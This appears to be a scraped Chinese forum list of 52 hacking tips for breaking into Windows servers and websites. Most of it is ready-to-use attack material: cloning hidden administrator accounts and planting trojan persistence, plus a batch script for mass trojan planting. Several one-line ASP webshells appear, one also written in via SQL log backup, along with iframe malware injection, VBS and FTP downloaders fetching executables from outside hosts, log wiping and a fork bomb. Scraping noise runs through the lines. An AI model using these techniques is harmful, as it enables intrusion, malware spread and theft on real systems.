Xp系统修改权限防止病毒或木马等破坏系统,cmd下,0 l. t- C- G7 F
cacls C:\windows\system32 /G hqw20:R
& U0 m' O% e8 s6 F+ [思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入5 P# |* r( t6 p5 X
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F; i+ f% y- J+ w9 L/ Q
3 i7 [, `; @9 {
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
9 W( v6 I( Q& i' q9 R
( Y; j9 N% l; D# C0 z% X0 a+ H3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
7 h+ b) k4 p0 m2 D$ c% b) `
# o( S ?7 o$ Y1 y4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号5 K' x( t) s, U' d6 h- q- W; [
9 M% |+ ]3 q& M( i% I" f, u O7 F
5、利用INF文件来修改注册表8 v6 l1 L0 v/ h
[Version], r& i Y/ E/ ~) t3 }8 Q
Signature="$CHICAGO$"& B* K* j: W- s5 _1 H. E
[Defaultinstall]* s9 g( t( t }5 b+ K
addREG=Ating
- T: K. _* x* X; T8 Q: K[Ating]' y, n7 S- t( c' a! ~8 B4 R
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
) M. {% }/ q' I% @# [0 r4 x以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
, r! u+ w% E% Irundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
5 G# B. q( Q: m2 j3 ?( w9 H其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU Q5 ?# F# Q+ d- Y, G
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU9 z# ~. |5 V: z3 l0 S# U
HKEY_CURRENT_CONFIG 简写为 HKCC& ?( R( ?' @- _. i
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值* E5 ]: N" {$ d( ]; e
"1"这里代表是写入或删除注册表键值中的具体数据
9 Y& {: J( a# Q. E) u2 d! b) A# [% {
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
8 D2 r3 U! H/ u6 p. W+ r8 [多了一步就是在防火墙里添加个端口,然后导出其键值; R K1 T) D& }- h; \
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
# Q }9 S8 S! F0 c* u% [! j
$ u! a# | Z6 A6 p7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽$ P* d3 `" [, v$ U6 ~: ]/ N6 }% g
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
% l. v) r a. s) a7 e7 n# y
$ j4 P8 p. n5 y3 l( W8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
: R# x1 c$ U& r; e4 H7 I+ x( @
' P& A( V( t" d6 c9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
. e, _7 v4 d* q0 Z7 V可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。* n: Z3 A8 p6 z/ V- l) b- }
) ~7 l6 l/ K# a7 h
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”- A2 O7 k$ q9 q4 K w, g& H
4 i/ l: P3 D# y; T9 h) W
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,; s1 T9 n; I0 G
用法:xsniff –pass –hide –log pass.txt
6 a9 O7 y3 D3 t7 M
+ ` w5 D6 s: B1 D12、google搜索的艺术* x# w8 _7 s+ \' J4 _; v0 P
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
0 v% y5 N4 y4 k7 A! V2 A或“字符串的语法错误”可以找到很多sql注入漏洞。6 ?8 Z7 |3 L2 }( s+ }7 Z7 ?
# D6 G! O! {+ W- p( |1 M; B' a4 s13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。) Y- k9 Q5 Y; j2 \0 s
: y" u( x9 m& x: Y
14、cmd中输入 nc –vv –l –p 1987
2 g) T, X# Z$ k* W做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃( U& s& G* W( d2 c+ x+ x
8 i8 `" D9 |6 u- @15、制作T++木马,先写个ating.hta文件,内容为+ r6 \9 J5 m: Z' g! X- z0 u& g5 n
<script language="VBScript">
* z3 d! c3 H/ T/ n8 U' Qset wshshell=createobject ("wscript.shell" )/ Q4 y7 i# Z# ^, ?$ y
a=wshshell.run("你马的名称",1)6 C1 q; |) u3 @& w9 T% W
window.close
! Q3 I' f. C: R5 q0 \5 a</script>
: E. D9 Z7 q4 I! n4 d再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。: x" D, W# X) z% Q, f, F y
/ e0 L9 x8 H4 e7 M& k
16、搜索栏里输入2 P+ a; j6 U7 D5 s
关键字%'and 1=1 and '%'='4 C* y8 P# C9 b
关键字%'and 1=2 and '%'='3 G( t/ j9 o0 r
比较不同处 可以作为注入的特征字符
6 W9 y" Y$ i9 k# A; H3 N& W& w" e- X/ K, R
17、挂马代码<html>
1 j9 l) n7 R' A. Z: j! ~<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>, g7 H" `- m" g! s+ T
</html>
* `: B2 {, j7 f* u( ]* A: T. ?/ @
6 ~: y! x: p2 a5 i: b5 ^+ d4 g: |18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
L q+ I7 O, h, z! Jnet localgroup administrators还是可以看出Guest是管理员来。
8 O# n" K" u# d( V& U7 Y4 Z- i
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等+ ~5 Q1 `, d4 ^/ Q9 M; A
用法: 安装: instsrv.exe 服务名称 路径# G% n. j9 k# { K
卸载: instsrv.exe 服务名称 REMOVE8 G- `4 z. y. [2 d
8 S; u6 { c7 Y* b% X+ u" ^, q. L. a) ]) _6 X
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
2 X2 E3 j6 a" P: T( ]2 _/ }不能注入时要第一时间想到%5c暴库。* X) E( Q# Y* L; x4 `
0 Q* a9 k2 G! r/ _# e \( o22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~" o+ m/ y4 W/ S2 J2 F) {( p6 b* ~
4 G8 [/ i( n, x2 T' c
23、缺少xp_cmdshell时
2 l/ M- d* m. f0 v" a+ H& A2 d尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'& p. n4 h: @* a- X6 k; U
假如恢复不成功,可以尝试直接加用户(针对开3389的)
: q% h& X, b1 A* gdeclare @o int
# v: m" \; x5 u5 N# s; U! xexec sp_oacreate 'wscript.shell',@o out' R- B; {4 b* _1 b; J# Z
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
( \) x: G. n! P$ @, |+ Q" s. x% X" j+ `& ?' @" }9 ~
24.批量种植木马.bat
( R; Z% r. i4 b' }8 y8 ]for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中" w" F3 k+ Z6 h
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
4 |/ C& I2 N" K3 d- t" M扫描地址.txt里每个主机名一行 用\\开头
: P( [$ u) M* r/ c. S
6 o8 g# G+ J3 p1 x. ?. S( A25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。' b! d! Q1 ^- Q* m' A1 D- t( e7 `
5 u: P7 J8 i+ u0 i8 A26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
3 I+ y" g4 [. a将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
# b/ x: p2 T* y& g0 j.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
6 I6 P6 f" `" \5 p2 f0 i. f. y$ i) @! I/ ]8 |+ ?
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
) W) ?& I. N/ v2 k8 q' b然后用#clear logg和#clear line vty *删除日志
" [( H L3 ?+ B( n3 {1 N' ~5 X% e4 J* Z+ U d# }& O( W: y7 \
28、电脑坏了省去重新安装系统的方法. w9 T8 o% P, v. ?; s5 t
纯dos下执行,
- Z( o6 ~! J* W/ i- `2 N3 ^xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config; o( d! G! Q% e' ]' A& F, t
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config" X( e% U w6 H+ {: B( C
5 X" @* U& \( q) }: J, g. N29、解决TCP/IP筛选 在注册表里有三处,分别是:; ]$ v! i+ o2 ]0 W2 i2 |. E
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
8 c$ H9 S- M0 B! q, c& j. VHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
7 {5 @3 w6 V& lHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip |) ?& U$ I E
分别用
0 y s) L7 a2 z7 _6 v. aregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip. u$ O% Y' f* p7 S8 H2 \# ]
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
) l. }3 n# Z9 R }# jregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
& h3 K" S% q" e% m# R3 b; y命令来导出注册表项
/ Y9 J9 t7 @* c, a然后把三个文件里的EnableSecurityFilters"=dword:00000001,
# [ @* H3 q! i/ b/ X4 s4 l改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用: }/ ~: G/ i- A+ @
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。3 r; T% L0 e" h( f% \- O7 f
# E w6 m/ X3 K4 W30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
' D2 } z k* e% g* P+ m, sSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
# V' O4 |& H1 e5 s" I/ I8 l8 B2 C# m) U" K6 ^- j0 \
31、全手工打造开3389工具" H1 {/ p5 B: `; n x7 O
打开记事本,编辑内容如下:6 ~ i5 x! t' X8 I# x- i2 q& [7 z6 f
echo [Components] > c:\sql6 G) @* r" A i; n1 u' ` T0 T
echo TSEnable = on >> c:\sql; W, w, M! g9 P0 h4 g1 W! |
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
; A: `8 K4 U) ]% y8 C( U编辑好后存为BAT文件,上传至肉鸡,执行
5 m; m8 h4 D4 D/ {5 O1 B7 e6 Y3 w( l) m3 k
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
: N2 x3 u1 U7 f4 ~0 m& A! m* V9 F& e* C+ f4 Y. m
33、让服务器重启4 W; [1 s+ U8 t$ w" _/ N G1 A
写个bat死循环:
7 [* u- W; H4 J@echo off9 L, R# I5 O) Q
:loop1, R$ `5 A) {6 G6 j. n/ @* S
cls
1 |. t9 c ]" D( v# z1 f9 Q5 zstart cmd.exe
5 q4 {6 _' s( @! Q( W/ I- S4 Y# Kgoto loop1* Y( t, w# a: T1 g8 o$ I9 k
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启+ Q0 R- _0 s% c; _7 `/ ~ B. O$ e
+ h2 T* e3 m7 U7 {34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,5 u0 l4 v3 o! z( e' p8 s
@echo off7 I" x( t- ~0 S5 }& l7 q. p& ?/ S l. |% X" Q
date /t >c:/3389.txt- s& {- D7 b- B0 E6 z8 |
time /t >>c:/3389.txt, K; x- J8 I7 N! h; J
attrib +s +h c:/3389.bat
' a/ B8 U8 x' |. C* M% ?attrib +s +h c:/3389.txt$ L8 s& W8 B2 t2 ^: }0 r! {3 m: X
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
9 `, f+ f& X2 @并保存为3389.bat
9 |6 `% Q# @1 ^打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号1 R3 y2 L! {5 I2 [( o
2 S: V0 k) D5 \35、有时候提不了权限的话,试试这个命令,在命令行里输入:9 ]) V) l+ @3 ^
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
$ C& _* @) t, r# o, _( ^# m( T$ V3 B输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。: J/ Z O7 B1 m; _$ C$ o
/ r3 z) k9 p& w36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
% F0 T3 l. j% l& K+ Lecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址9 X. y1 h) N: a9 T
echo 你的FTP账号 >>c:\1.bat //输入账号% [7 e( R5 T9 P4 I/ r
echo 你的FTP密码 >>c:\1.bat //输入密码
`* a8 @7 I6 _1 g$ ~echo bin >>c:\1.bat //登入
" K! y# U0 f/ a) O7 Y) f: }; @/ zecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
) E7 k! z* J4 F) d# X7 Y1 \. Necho bye >>c:\1.bat //退出7 v9 x; G2 b% V
然后执行ftp -s:c:\1.bat即可
+ F* x( j: b5 n$ f
+ c" x4 Z! e J37、修改注册表开3389两法) d" y9 `0 p Y& b$ c" g) [
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
1 Y8 V# `; \: C: [$ xecho Windows Registry Editor Version 5.00 >>3389.reg
( v! `5 O K/ i+ k; E: i; necho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg8 E9 |5 a( g0 T! q# N$ h
echo "Enabled"="0" >>3389.reg
: v0 w" p' r9 Y4 _9 secho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows' Z6 G2 n4 [6 s; R
NT\CurrentVersion\Winlogon] >>3389.reg& |% _+ F# U/ K0 J! D. Y$ |
echo "ShutdownWithoutLogon"="0" >>3389.reg2 Z; V( |8 h! d/ Z" P; \: \; J: k
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]6 u8 y* q7 c i- f6 e; ?3 h& ^$ K
>>3389.reg4 c# n" S7 y7 y" a6 W p
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg3 \4 w" {! r; K' [# M. k* J `
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
) d1 x; e3 Q3 I6 p+ i1 e>>3389.reg6 @: u* N+ D$ s. G+ d& e# K& w
echo "TSEnabled"=dword:00000001 >>3389.reg! a4 e' b8 l9 r" ^/ G4 L
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
4 H3 i! @3 t, u9 S) C* W2 pecho "Start"=dword:00000002 >>3389.reg* {' i5 U& s" k# }
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]( [. L% O! F+ b* M" R2 w- P0 ?
>>3389.reg9 H8 H) p- X2 I3 ]
echo "Start"=dword:00000002 >>3389.reg" n8 f1 k' } }! |; ~
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
- \/ I, V, t! ~" c. p B! i/ Yecho "Hotkey"="1" >>3389.reg; U3 M1 t7 `1 V; _- c8 c
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal! o) l4 O/ Z! x
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
% g, T# s& R" n! g$ m( Hecho "PortNumber"=dword:00000D3D >>3389.reg$ g) q; b; G5 W# a! t
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal6 K2 [9 h, v2 q2 ~6 b+ X0 \
Server\WinStations\RDP-Tcp] >>3389.reg2 c$ m8 f' f' C8 T
echo "PortNumber"=dword:00000D3D >>3389.reg: O& {" | T! Y2 w/ J2 a2 ]" ]* ]5 ?' F
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
) o6 h! q A4 U8 I(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)% Y4 R7 W: p- z! {) M) C2 f$ G6 @% W
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效0 }/ i: \( Y$ @% T
(2)winxp和win2003终端开启( Q, m, f$ i. _8 n8 w. v8 ^1 @
用以下ECHO代码写一个REG文件:
" d3 R* A* X5 e/ |' Zecho Windows Registry Editor Version 5.00>>3389.reg
9 R9 O/ S- _8 d+ R. j0 @3 E' v5 f kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
- j* F, X. n }8 L' Q) F) Y/ H# iServer]>>3389.reg2 l, n# Q }3 Z8 O# p( u
echo "fDenyTSConnections"=dword:00000000>>3389.reg
$ I! ]6 c9 H6 }% P) {echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal, ` c4 C s, i, P$ }, O6 G8 L- O
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
$ z% o4 z$ S% V- ~& k! `+ Wecho "PortNumber"=dword:00000d3d>>3389.reg
1 ~8 m, J+ c Y/ f! q/ [8 [6 C5 U2 Jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
+ H9 N& D0 d3 O5 V' gServer\WinStations\RDP-Tcp]>>3389.reg
0 O3 I) Z1 P% r1 T) |' Q! w+ `echo "PortNumber"=dword:00000d3d>>3389.reg: P- `3 h) C3 I4 Z$ A
然后regedit /s 3389.reg del 3389.reg Y/ ]) l" j5 v: z+ D' Y9 z X
XP下不论开终端还是改终端端口都不需重启) v/ Y5 m7 M! y* C! {
& ^1 N' A, m2 _$ x" @
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
$ M4 i( q5 M" _, X3 F$ X用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa', X; K: |. V. B% e' Z
3 L% h$ |( p0 H2 W
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的! ~* \& s1 M( `: O
(1)数据库文件名应复杂并要有特殊字符* c6 o( M; a2 O
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
! T" n% D# E5 {将conn.asp文档中的
- ^( V$ g; J: n8 D" H5 u+ r' JDBPath = Server.MapPath("数据库.mdb")
* b- N3 \0 M. V( _* s8 R9 mconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath9 {( S+ {$ Q" D7 `; [6 m9 s
" u+ S4 G4 q* d) M( p8 K
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置8 y5 N, j9 x- E# q8 E
(3)不放在WEB目录里
7 A* K& ]5 t9 O% ~1 S! C: @; e, `& G8 A) q9 A! a
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉# b% C8 k x9 m* L$ [/ y; o
可以写两个bat文件, `8 _! X1 X! v9 Z- G6 e1 s: e5 C, w
@echo off8 |+ g8 G1 L; [( Y* T: z
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe/ y' e0 \3 F; X4 I; K
@del c:\winnt\system32\query.exe( \$ U' g" R* }- u# o
@del %SYSTEMROOT%\system32\dllcache\query.exe& U+ Z$ a& [ I3 J8 z3 N; z
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
$ z( m8 ^1 a( o; G: ?9 M( c; K9 {2 _) g4 a$ y) ~" u+ c; u
@echo off) s& E8 f1 H9 d8 ]( t, W
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe% Z2 s+ `$ A5 ~# l3 r
@del c:\winnt\system32\tsadmin.exe. j2 t" i9 x L5 o8 d" W
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex. D! C& J" O' I. K$ `3 A/ a
& J% ~. ?& u# [/ Q" }
41、映射对方盘符2 \, j% m5 L J" N
telnet到他的机器上,# p; H% |/ Y( K8 r
net share 查看有没有默认共享 如果没有,那么就接着运行3 h* U7 q- @- ?
net share c$=c:
# Y% l, l( w$ M3 Nnet share现在有c$
) ~: f& x9 W9 A在自己的机器上运行
9 |7 l% }: X; y: G$ F9 knet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
' {' R% }8 n, V3 S4 j9 T8 a7 Q9 @$ p# B# D
42、一些很有用的老知识
& G" k+ [; X T- O2 ], ytype c:\boot.ini ( 查看系统版本 )
' p/ t2 t C% P. bnet start (查看已经启动的服务)
4 C0 R0 C. ~9 F9 u9 O; hquery user ( 查看当前终端连接 )
: M. w: e9 y- h% V! |net user ( 查看当前用户 )+ \1 Y/ [9 A2 V% P- l- H! I
net user 用户 密码/add ( 建立账号 )
' {5 X2 \0 z' |& n9 t) V) p9 p& ?net localgroup administrators 用户 /add (提升某用户为管理员)5 G6 x) M# O8 p5 w/ s/ _3 C2 N
ipconfig -all ( 查看IP什么的 )# ?5 l9 e& _0 L' O1 s
netstat -an ( 查看当前网络状态 )
7 ?( C/ k" i# ?# q- Efindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)" l3 d6 U' X) J% ]% o7 G. g
克隆时Administrator对应1F4
u1 P& Y% v( ^" w% N# C9 Rguest对应1F5
4 f8 Q/ h5 d5 m( J' {tsinternetuser对应3E85 Q. _9 p& }( ?" A
- m* j( }1 n( ~* ^8 M% _& ?43、如果对方没开3389,但是装了Remote Administrator Service
# t% Y6 j* M5 P2 M/ q用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
E+ |1 A8 L1 `' `$ U4 R: ?解释:用serv-u漏洞导入自己配制好的radmin的注册表信息$ A: L8 ]1 O% }
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
9 Z1 Q) g7 x1 T; h; U
6 }7 P0 o% L0 Y& s44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
" s3 r$ _/ r! a2 N' V! K# ?' Z/ G$ Z本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
% `" w9 U9 q3 p9 T- @$ S& e6 a$ B- T) C/ V) @! h; `
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
2 I( p: ]" Y3 ?" recho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open1 ~' ^* o- b, P6 F' `% r4 H
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =( G: U. O; ~/ z- u" a0 i
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =# w' X8 t3 i+ \/ t, S
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs+ J l! t6 o: @& s( N+ h8 ]9 Q
(这是完整的一句话,其中没有换行符), Q/ x- Z1 X( }: ^$ |! N
然后下载:, S ]# U* T% q
cscript down.vbs http://www.hack520.org/hack.exe hack.exe1 n7 m# y. L0 e, _! j) f, `% L
x. X0 S5 b* N. D/ i% ]
46、一句话木马成功依赖于两个条件:
3 S9 n' W$ e% s! B9 e1、服务端没有禁止adodb.Stream或FSO组件
& L1 `, Q3 `. F2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
G- {+ l6 O$ g9 e% g) p; { r* C+ @
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
3 t; w$ O3 @" _7 \6 a& L# G;alter database utsz set RECOVERY FULL--
$ o7 H$ Z) \5 ~- X4 {$ S. u! ^% T;create table cmd (a image)--; I' \3 a7 {" K2 X
;backup log utsz to disk = 'D:\cmd' with init--1 y" [; B$ k5 U& N! r, S9 U; Y
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
; k/ _6 R4 b" L$ O! M;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--4 R n& z" A' P* m2 W: d
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。# b! ]- S3 a8 {+ U5 u
4 O, N# s0 d& `9 M d* h2 E! U48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
& m8 k- T( L T" m* w* j
! ]; Z8 o4 Q4 A) w" N7 \ F用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
L& C3 n& p$ U5 i7 p- y/ Y所有会话用 'all'。
; p) |1 P# y: t-s sessionid 列出会话的信息。3 l% r' D! W9 }# M3 n7 Q
-k sessionid 终止会话。' ]0 G+ p' L5 S; R1 c+ a
-m sessionid 发送消息到会话。
7 {- J/ a2 u8 i& T$ M7 g, `/ r7 i
1 G7 \$ `/ p. n! Tconfig 配置 telnet 服务器参数。
+ V5 O, C1 L+ c, h/ M! I
3 u; H( v2 n3 c$ b2 n, ^common_options 为:
% r$ C9 K v- o* f-u user 指定要使用其凭据的用户) }. n( L1 B. m# O
-p password 用户密码
+ N3 h* a7 Q/ R0 L0 X4 M& q8 l9 D9 ~9 y& v4 E) B
config_options 为:
8 j2 w: N' P( i; W" I5 x% Ndom = domain 设定用户的默认域
! l- @* Y7 d0 h" l. w B: a# z$ T0 [ctrlakeymap = yes|no 设定 ALT 键的映射' {: r, o- \% `0 S( T* I' k. D
timeout = hh:mm:ss 设定空闲会话超时值( f1 f: H/ e& [
timeoutactive = yes|no 启用空闲会话。- T5 o9 g# r; K. s# l4 b# E6 c, ^5 z
maxfail = attempts 设定断开前失败的登录企图数。
# s+ k9 m. I& a | O; v" C$ Zmaxconn = connections 设定最大连接数。+ M6 B% j/ K- B4 k+ {) w
port = number 设定 telnet 端口。- r6 h: N8 P8 r3 }
sec = [+/-]NTLM [+/-]passwd
* |& P0 `9 d$ J. ^7 Y7 Z' {6 B设定身份验证机构5 k: S4 q7 y& o+ P, F, l" c1 q
fname = file 指定审计文件名。5 ~- T, u% z( F5 y8 E- o7 s) P
fsize = size 指定审计文件的最大尺寸(MB)。7 V0 I% _- p4 s
mode = console|stream 指定操作模式。
3 `5 v- ^+ Z1 Y" oauditlocation = eventlog|file|both
$ a4 D$ m: s9 S2 J指定记录地点
7 a' l" L, g: I0 @; aaudit = [+/-]user [+/-]fail [+/-]admin
' S' ?) m3 c4 J9 R1 z* p
* z7 E, M+ X" h49、例如:在IE上访问:, v5 W. } w: q5 A; O d. h0 Q
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
8 {7 ?7 p# ] _' Jhack.txt里面的代码是:
( |7 H8 Y0 I$ S' ~9 t X6 E7 P$ ?<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
0 s. i; Z& I2 p+ l; x0 l把这个hack.txt发到你空间就可以了!
+ W* u- W' {& d$ O这个可以利用来做网马哦!
6 s! W! [7 L5 V$ _% ~5 e* H. H8 R: k' b5 y9 O5 g( Y
50、autorun的病毒可以通过手动限制!& P! T% f: q% B s
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!1 @/ y9 k2 h( X4 t, x8 V4 ^8 n% v
2,打开盘符用右键打开!切忌双击盘符~4 O. O$ q# o/ P
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!. j; o& J0 P. a; A# k
9 |0 S+ F1 n. m6 N0 _, ]$ l51、log备份时的一句话木马:; q3 [4 H6 i F: G1 ?
a).<%%25Execute(request("go"))%%25>/ q' d8 ~& |- [/ L9 ^) K% B8 L
b).<%Execute(request("go"))%>' ]1 y9 j: a; o: m s3 B3 Z& k( {
c).%><%execute request("go")%><%
( Z8 n' f* D& Gd).<script language=VBScript runat=server>execute request("sb")</Script>; U& S" f- \4 p8 n; ^& Z
e).<%25Execute(request("l"))%25>
% W, }2 }7 }7 K. I! pf).<%if request("cmd")<>"" then execute request("pass")%>
) \/ Y B3 r5 f; w8 W$ ~# q! B
8 U/ e8 G6 t* X* Q- t! n5 o52、at "12:17" /interactive cmd# X4 w3 Z+ Y) V' m# O
执行后可以用AT命令查看新加的任务
